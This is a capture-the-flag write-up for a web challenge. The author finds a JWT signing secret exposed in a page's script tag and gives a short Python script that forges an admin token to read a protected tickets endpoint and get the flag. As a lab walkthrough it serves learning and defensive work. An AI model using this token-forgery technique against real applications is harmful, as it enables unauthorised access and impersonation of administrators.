rosehacks@pwny$ cat binary_basis.txt The solution for this challenge turned out to be surprisingly easy! Ironically, I spent the most time on it because I was overthinking and making it harder than necessary. Initially, I tried every JWT vulnerability trick I knew, especially since I couldn’t find anything unusual in the code. The SECRET in utils.py was redacted, leading me to believe that I needed to brute force it, or that there might be a deeper exploit to uncover...
The Application
The Solution
From the code review, we identified that the /tickets endpoint performs a SQL query that retrieves all submitted tickets, including one from the admin containing the flag. Our objective was to access /tickets, but there was an obstacle: the endpoint verifies the username parameter in the JWT payload, and it checks that the token’s signature matches with the server’s JWT secret.
Initially, we thought we didn’t have this secret, so we explored other avenues. However, in the only code file we hadn’t examined closely—index.html—we found the JWT secret embedded within a script tag. This meant we could now forge a JWT with username: admin, sign it using the discovered secret, and access the /tickets endpoint as the admin.
const secretKey = await crypto.subtle.importKey(
"raw",
new TextEncoder().encode("halloween-secret"),
{ name: "HMAC", hash: "SHA-256" },
false,
["sign"],
);
Generate JWT Script
import jwt
# Define the secret key we found in the source code
secret_key = "halloween-secret"
# Define the payload, which includes setting the username to "admin"
payload = {
"username": "admin",
"iat": 1729902153 # This is just an example; you can set the timestamp to the current time if needed.
}
# Create the JWT with the HS256 algorithm
token = jwt.encode(payload, secret_key, algorithm="HS256")
print("Generated JWT for admin:", token)
After generating the admin JWT, I entered it into the cookie storage and refreshed the tickets page, witch revealed the flag!